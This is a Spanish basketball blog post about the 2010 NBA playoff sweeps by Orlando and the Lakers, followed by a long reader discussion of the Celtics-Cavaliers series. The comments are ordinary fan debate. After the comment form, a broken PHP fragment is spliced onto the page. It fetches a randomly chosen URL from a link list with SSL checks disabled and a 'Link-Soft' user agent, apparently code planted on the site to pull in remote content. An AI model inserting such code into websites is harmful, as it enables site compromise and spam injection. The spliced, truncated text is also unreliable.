Playoffs 10/05/2010: Suficiencia

11 de May de 2010 por txusma

Y no entendemos suficiencia como aquellos exámenes que había antes (¿o existen todavía?) para recuperar asignaturas suspendidas, no. Tampoco lo queremos entender desde el punto de vista despectivo de presunción o pedantería sino como sinónimo de capacidad, es decir, aptitud, talento, cualidad que dispone alguien para el buen ejercicio de algo. Y ese algo, en este caso, es jugar a baloncesto.

Suficiencia es la que ha demostrado Orlando de principio a fin en este serie, 4-0 con todos los partidos ganados por al menos 14 puntos y con una media de 25. Impensable, como tantas cosas que han sucedido y están sucediendo en esta segunda ronda de Playoffs. El partido de ayer siguió el guión previsto. Dwight Howard no se tuvo que esforzar en exceso porque sus compañeros están a un nivel brutal. Jameer Nelson se fue como y cuando quiso de cualquier defensor que se le puso delante, Rashard Lewis y Mickael Pietrus ametrallaron el aro de Atlanta desde más allá de la línea de triple, y Vince Carter nos brindó otra gran actuación, esta vez en el tercer cuarto. Y evidentemente, el resto de jugadores cumplieron su papel casi a la perfección. Por Atlanta, mejor no hace sangre. Ya sufrieron como cosacos frente los Bucks y ahora han sido completamente arrollados. Mentalmente han de estar destrozados.

Y en Salt Lake City, más de lo mismo. Los Lakers se han alzado con la victoria definitiva de manos de un inconmensurable Pau Gasol, que ha elevado su nivel de juego en estos Playoffs a cotas nunca vistas, y de Kobe Bryant. Vamos, lo de siempre. Igual que la dinámica del partido: Primera parte muy fuerte de los amarillos, tercer cuarto con los Jazz recuperando terreno y, finalmente, arreón final de los Lakers para dejar las cosas bien claritas. 4 a 0 y los de Los Angeles recuperando parte del crédito perdido en la primera ronda frente los Thunder. Un único pero: el partido de ayer lo ganaron exclusivamente Pau y Kobe con algunas aportaciones puntuales de Fisher y Brown. Bynum, Artest y Odom bastante desaparecidos en ataque. Tal vez no hizo ni falta que se enchufaran. Y un récord de esos tan largos que le gustan a los americanos. Kobe Bryant batió anoche el récord de partidos de Playoffs fuera de casa con oportunidad de ganar las series anotando 30 o más puntos. 7 ni más ni menos, por delante de Elgin Baylor o Michael Jordan. Ahí queda eso.

PREMIOS

MVP: Genial actuación de la pareja de moda Kobe-Gasol, 32 puntos para el primero y 33 puntos y 14 rebotes para el segundo. A veces, cuesta adivinar quien es el escudero de quien, lo que dice mucho a favor de ambos.

Sorpresa: ¿Os acordáis de Sundiata Gaines? Pues anoche salió con el partido decidido a falta de minuto y medio y al tío le dio tiempo de anotar 7 puntos…

Decepción: Patético partido de Marvin Williams, incapaz en ataque (2 puntos) y en defensa. Si se suponía que tenía que defender a Rashard Lewis, se cubrió de gloria.

Esfuerzo en vano: Deron Williams es el que más ha remado contra corriente en la eliminatoria frente los Lakers. Anoche añadió 21 puntos y 9 asistencias a su lista de esfuerzos en vano…

Y MAÑANA…

Han ido tan rápidas las 3 series que ya han finalizado que vamos a llegar a una época de escasez de partidos tan solo salpicadas por algunos Cavs-Celtics. Suerte que estos partidos son tan intensos que nos valen para días enteros. Mañana en Cleveland y con 2-2. Será lo que LeBron o Rondo quieran…

Comenta

26 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    El único crédito perdido por los Lakers contra los Thunder fue para los que no vieron la serie. Estos Lakers han empezado mucho más sólidos que los dos últimos años… y también se les adivina la misma tendencia de menos a más. No digo que lo tengan hecho contra los Suns, pero estos van a tener que jugar muy bien para tener opciones.

    Los Jazz son un equipo impresionante. Hay varios factores que les han penalizado excesivamente. Las lesiones (Kirilenko no ha llegado a estar tampoco) y que Lakers es un equipo que por configuración les va mal. El tema se ha agravado con el increíble estado de forma de Pau, que los ha terminado de matar.
    Tampoco les iría mal recuperar algo del espíritu defensivo de antaño, pero creo que hubieran dado mucha guerra al resto de candidatos del Oeste (y lo demostraron contra Denver)

    A los Hawks les ha pasado un poco lo mismo. Orlando es lo peor que les podía tocar… aunque creo que han llegado bastante mal a los playoffs. Lo de los Bucks fue sintomático. Si a un grupo con 5 o 6 tíos usables le quitas dos más te queda la banda que han sido en esta serie.

      Citar

  2. Larg dice:
    #2

    Puedo resultar tiquismiquis pero me permito la licencia porque siempre tenéis mucho cuidado con la ortografía (soy fiel a vosotros desde hace dos temporadas aunque no escriba). Cambiad, por favor, ese “vindró” que se os ha colado por “brindó”.

    Y nada más, espero de nuevo una final Lakers-Magic, me parecen los dos equipos más fuertes, y que por supuesto que lleguen los Celtics a la final de Conferencia. Veremos esta noche qué pasa.

    Saludos y gracias por vuestro excelente trabajo.

      Citar

  3. pcerezo dice:
    #3

    Amén Deer.
    Lo de Pau es tremendo. Los números, la influencia en el juego, su estado físico. Era impensable que Pau Gasol iba a tener “casi” la misma influencia en el juego estando en ese equipo Kobe Bryant.
    Es demasíado no disponer de Kirilenlko una bja muy sensible para Utah aún así yo ya dije que los Lakers solo pueden ir a mejor, mientras que los demás ya están en quinta.

    En cuanto a Hawks un equipo sin alma. Veremos como solucionan la posible marcha de Joe Johnson.

    Un saludo,
    Pablo

      Citar

  4. sergio dice:
    #4

    En el graaaan supuesto de que los Lakers se hicieran con el anillo y Gasol mantuviera este nivel… al menos podrian dar un MVP de las Finales compartido no??

    Creo que los Jazz se hubiesen cargado a Suns y Spurs y realmente son el segundo mejor equipo de la Conferencia.

    Menuda forma de mover la pelota por el perimetro tienen los Magic… A veces pienso que ese tipo de juego es indefendible, y que como tengan su dia en el tiro exterior no hay quien les gane. Se pondran Artest y Bryant a defender a Lewis y Carter para minimizar su impacto?

      Citar

  5. MagicJohnson32 dice:
    #5

    Pues definitivamente parece que los Lakers entran en [Modo Playoffs], aunque coincido con Deer en que contra los Thunder se les vio mejor que en otras primeras rondas. Pero el nivel de Kobe & Pau es como para asustar. Anoche necesitaron poquísimo de sus compañeros para ganar muy cómodamente en una de las pistas más difíciles. Ya habrá tiempo de analizar la serie contra los Suns en el artículo correspondiente, pero me pregunto qué leches piensa hacer Gentry ante la parejita.

    Por otro lado, Joe Johnson tiene suerte del efecto LeBron; es decir, de que haya un montón de equipos que hayan reservado mucho salario para ir a por agentes libres este verano. Porque madre mía, ha dado verdadera pena.

      Citar

  6. Love Denise dice:
    #6

    Ahora resulta que los Hawks son unos mataos, y que Joe Johnson, Crawford, Marvin & Cia son unos paquetes, la defensa de los Magic no ha tenido nada que ver

      Citar

  7. MagicJohnson32 dice:
    #7

    No son unos mataos, pero sufrir como perros para ganar a los Bucks no presagiaba nada bueno ¿no?

      Citar

  8. TheDeerHunter dice:
    #8

    Nadie ha dicho que sean unos paquetes… pero ¿crees que Orlando apalizará de esa manera al rival que salga del Cavs-Celtics? Yo creo que, en efecto, ya se vió contra unos Bucks sin varios ilustres que llegaban muy justos al momento de la verdad. Para mí está claro que ha sido producto de lo corta que es la plantilla, pero es que ya de entrada los veía como el peor semifinalista de conferencia de todos.
    Diría que la final de conferencia va a darnos la medida exacta de lo que son los Magic.

    Sergio, me parece que es pronto para hablar de si Artest o Kobe se emparejarán con Lewis o Carter… pero yo no creo que hubieran muchos cambios con respecto a los partidos de regular, como apenas los mínimos con respecto a la final.
    Los Lakers tienen buenas armas para defender a ambos, como también a Howard. Quien más daño podría hacer es Nelson.

      Citar

  9. kantonyo dice:
    #9

    Yo no creo que Atlanta sean unos mataos, lo único que tienen una plantilla muy corta y que han llegado con la moral muy baja a la serie y muy cansados. En frente se han encontrado a la plantilla más completa de la liga, lo peor que les podía haber pasado. Aunque sinceramente creo que no hubiesen tenido mejor suerte con Boston y Cleveland.

    No es de las plantilla con más salarios, por lo que habrá que ver como reacciona el GM de Hawks este verano, si consigue algún agente libre decente y si no se le escapa ningún titular, aunque si se va Marvin Williams tampoco creo que pase nada…. cobra 7M$, creo que se puede encontrar algo mejor, incluso subir esos 7 a 15M$ por su margen salarial sería posible. Atlanta es un mercado poderoso con burbujas.

      Citar

  10. kantonyo dice:
    #10

    Deer, tienes razón en lo de Nelson, además recordar que el año pasado a estas alturas de temporada no era ni la mitad de su sombra. Por lo que fue una de las claves de aquella final.

      Citar

  11. Love Denise dice:
    #11

    que la plantilla era corta, lo sabiamos todos, pero se acusa todavia mas por el hecho de jugar con la plantilla más completa y con más recursos del campeonato. La defensa de los Magic también ha estado bestial, en estos 8 partidos, su máxima anotacion encajada ha sido 98 puntos.
    Contra unos Celtics, pienso que los Hawks les podía haber ganado algunos partidos.
    No creo que Orlando le pegue semejante paliza a los Cavs (ni viceversa), en cambio, a los Celtics creo que sí les podría meter alguna tunda (no en todos los partidos de la serie). Los Celtics también son una plantilla muy corta, aparte del Big Four..qué hay? Solo salvaría a Glen davis y el trabajo defensivo de Perkins Demasiado merito tienen estos 4.

      Citar

  12. TheDeerHunter dice:
    #12

    Te veo especialmente sensible y no entiendo porqué LDenise.
    Todo el curso muchos hemos dicho que la plantilla de los Magic es posiblemente la más completa (en lo de con más recursos según cómo lo definas) y también que es el peor rival que le podía tocar a Atlanta precisamente por el motivo que comentas.
    Sobre la defensa, tampoco digo que no, pero ni Atlanta ni Charlotte se han caracterizado por anotar excesivamente. Además, Jackson llegó tocado… y la plantilla de los Hawks al completo han llegado hundidos.

    Creo que te equivocas de plano con respecto a los Celtics. No son un rival cómodo para nadie. Tampoco para Orlando ni para Lakers. De hecho, hasta es posible que todavía lo podamos comprobar…

      Citar

  13. Love Denise dice:
    #13

    ojala lo comprobemos, y que el tiempo le de a cada uno la razón. Sería el primero en reconocer que me equivoqué, pero no creo que estos Celtics lleguen muy lejos, como ya he dicho, demasiado han hecho ya habiéndole ganado 2 juegos a un equipazo como Cavs.
    En mi humilde opinión, deberían darle más bola a Davis en detrimento de Wallace, e implicar a Robinson en el proyecto igual que lo están haciendo con el resucitado Tony Allen

      Citar

  14. TheDeerHunter dice:
    #14

    Yo tampoco entiendo muy bien lo que pasa con Robinson. Lo cierto es que, con todo lo que me gusta Rivers, quitando a PJ Brown nunca ha logrado involucrar demasiado bien a gente nueva a su proyecto.
    Podría decir lo mismo de Wallace (aunque creo que está haciendo mejor trabajo del que indican sus números) o de Marquis Daniels.

    Lo único que digo es que Cleveland está pasando las de Caín siendo tan potente o más que Orlando y lo más impresionante de todo es que en cada partido pelean de una forma distinta.
    Para mí es un axioma lo de “nunca subestimes el corazón de un campeón”. Es cierto que la eliminatoria va 2-2 y que casi seguro que la terminará ganando Cleveland… pero yo no me quito la sensación que de 4 partidos en 3 ha sido mejor Boston.

      Citar

  15. pcerezo dice:
    #15

    Yo creo que no se puede criticar nada la rotación de Rivers. Ha pasado con 4-1 la primera ronda y le lleva 2-2 a Cavs, creéis que les podéis exigir más a los actuales Celtics? No creo que con Robinson o Daniels jugando más minutos hubiesen ganado los otros dos partidos.

    Los PO nos vuelven a demostrar que cuanto más ilusiones nos hacemos peores son. Tres semifinales de conferencia resueltas con 4-0 y en muchos partidos sin ninguna emoción. Una lástima.

      Citar

  16. sergio dice:
    #16

    Hombre Deer, a mi tambien se me ocurre James Posey durante los Playoffs del título. Supongo que el principal motivo por el que Nate no juega es porque tiene delante a Rondo… el mejor base que queda en competicion ahora mismo (si, algo mejor que Nash) y porque no lo veo enfrentandose en la posicion de 2 a West, Parker o Moon que son mucho mayores que el y grandes defensores. Ahora mismo no creo que podamos ponerle muchas pegas a la gestion de la plantilla que esta realizando Rivers…

    Los Cavs siguen siendo favoritos. Lo son por plantilla, por LeBron, por factor cancha,… pero no por entrenador. Creo que al señor Mike le queda algo grande este equipo. El sistema de regular, con 82 partidos, permite fichar un entrenador nuevo sin que peligre demasiado las tendencias de los equipos. Hubiesen tenido mucho tiempo para adaptarse a las novedades.

    Creo que Denise tiene razon.. ahora mismo el equipo favorito para llevarse el titulo son los Magic. Y luego los Lakers. Aparte de la tendencia a dormirse de los amarillos y de que los de Florida no se hayan enfrentado a grandes retos hasta ahora.

    Deer, volviendo a unas eventuales finales Lakers-Magic y sin saber lo que hay en el cerebro del maestro Zen… no me pareceria una idea tan descabellada esos marcajes. Odom se quedaria con Pietrus-Barnes y realizando ayudas a Gasol-Bynum. De todas formas el año pasado cada uno cogio a su par en el mismo puesto y supieron contrarrestar su juego. Este año quizas el mayor peligro venga de Nelson… pero me extrañaria que no lo defendiera otro que no fuese Fisher. Ademas, no tiene ni de lejos la velocidad de los dos bases a los que se ha enfrentado ahora. Ah! y han sabido minimizar la aportacion de Deron respecto a la ronda anterior frente a Denver en una buena cantidad de estadisticas: 4 puntos, 3 asistencias, un 10% en tiro y casi un 20% en triples menos que contra los de Colorado.

      Citar

  17. MagicJohnson32 dice:
    #17

    Pues yo no encuentro ni un sólo motivo para dar más protagonismo a Nate. La duda es ¿por qué lo firmaron? Si algo ha hecho duros y competitivos a los Celtics no es precisamente todo lo que Robinson representa y aporta.

      Citar

  18. Love Denise dice:
    #18

    Nate Robinson no es la panacea, pero sí es un jugador bastante aprovechable saliendo desde el banco.
    En cualquier equipo tendría sus 15-20 min como mínimo.

      Citar

  19. kantonyo dice:
    #19

    Yo tampoco espero mucho de Nate. Como revulsivo tal vez.

    Habeis sido injustos con Rivers al decir que no ha dado oportunidades a jugadores. Como ya ha dicho Sergio lo hizo con Posey. Además es para mi el verdadero culpable de la progresión de Rondo al darle la batuta tan pronto en un equipo campeón (draft 21).

    Tony Allen lo está haciendo bastante bien en la eliminatoria, otro acierto de Rivers al darle protagonismo, 26 minutos en el último partido. Y Rasheed Wallace lo está haciendo mucho mejor que contra Miami y que en la liga regular, aunque todavia está por debajo de lo que se podría esperar.

    Aunque creo que Glen Davis debe ser titular y tener más minutos, en esta serie contra Cavs, Perkins lo está haciendo mejor y no creo que sea el momento de hablar de ello. Davis está sufriendo mucho en esta eliminatoria.

    No sé en que os basais para decir que Orlando es más favorito que Lakers. Yo creo que en este momento están a la par. Pero vamos que sólo quedan 5 equipos en liza y puede ganar cualquiera de ellos.

      Citar

  20. kantonyo dice:
    #20

    Por cierto que opinais sobre Paul Pierce, con un 32% 16 de 50 en tiros de campo, 4 de 18 en 3p con 22%. Parece que su defensa contra LeBron le está pasando factura.

    Y una pregunta para LoveDenise, quien es el peor equipo en los playoffs en la linea de tiros libres?

      Citar

  21. MagicJohnson32 dice:
    #21

    kantonyo: “No sé en que os basais para decir que Orlando es más favorito que Lakers.”

    Se basan en sus ganas xDD

      Citar

  22. TheDeerHunter dice:
    #22

    Hablo de mucha memoria… pero ¿Posey no estaba desde el principio en la temporada del título?? Si no es así, desde luego que pasa al sentido positivo del asunto.

    Jooder cómo estáis de sensibles. Ha sido un simple comentario… apenas llega a crítica. Yo sólo digo que la plantilla de los Celtics lleva demasiado tiempo siendo corta y más para un equipo por definición veterano… y más aún porque fichajes los han hecho, no es que no haya habido ninguna incorporación.
    Como digo… desde la temporada del título, queráis o no, ninguna nueva cara ha rendido mínimamente en positivo (de hecho Tony Allen ya estaba aquel año, pero quitando algún partido suelto tampoco es que haya sido la ostia en barca)

    Y sí… lo de Orlando favoritos, hay que demostrarlo en pista. De momento, realmente no son favoritos ni contra Cleveland, mientras no se demuestre lo contrario (aunque a mí me parece mejor equipo)

      Citar

  23. sergio dice:
    #23

    Posey si que estaba desde principios de temporada, pero no habia entendido esa puntualizacion en tu comentario. Creia que te referias a secundarios llegados a principios de cada temporada. Pero que si fuese asi… podriamos meter a Sam Cassell que si llego en el ultimo momento

      Citar

  24. Viva_Dirk dice:
    #24

    Yo tampoco creo que Rivers halla tenido ningun fallo de gestión los casos de M.Daniels y Robinson no son achacables a el, y Sheed cuando ha querido ponerse ha jugar lo ha hecho, antes su comportamiento ha sido vergonzoso.

    Y queria hablar un poco sobre Tony Allen que ha tenido muchísimos problemas con las lesiones pero si esta al 100% físicamente es una pieza muy interesante para Boston, muy al estilo Ariza para los Lakers el año pasado.

      Citar

  25. TheDeerHunter dice:
    #25

    A mí Tony Allen me parece interesante (no sé si tanto como Ariza), lo mismo que Marquis Daniels. El año pasado tuvo unos números impresionantes y me daba la sensación que podía encajar perfectamente…
    De Robinson tengo alguna duda más, lo mismo que de Wallace o Finley… pero es que son muchos casos. ¿Quien tiene la culpa de eso, Viva?

    Sam Cassell… podría ser sí. Pero si no me falla la memoria sólo estuvo bien en algún partido de la final.

      Citar

  26. Uno cualquiera dice:
    #26

    Vaya paliza de los C’s a LeBron (que no metió un tiro de campo hasta el 3º cuarto) y compañía :O

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>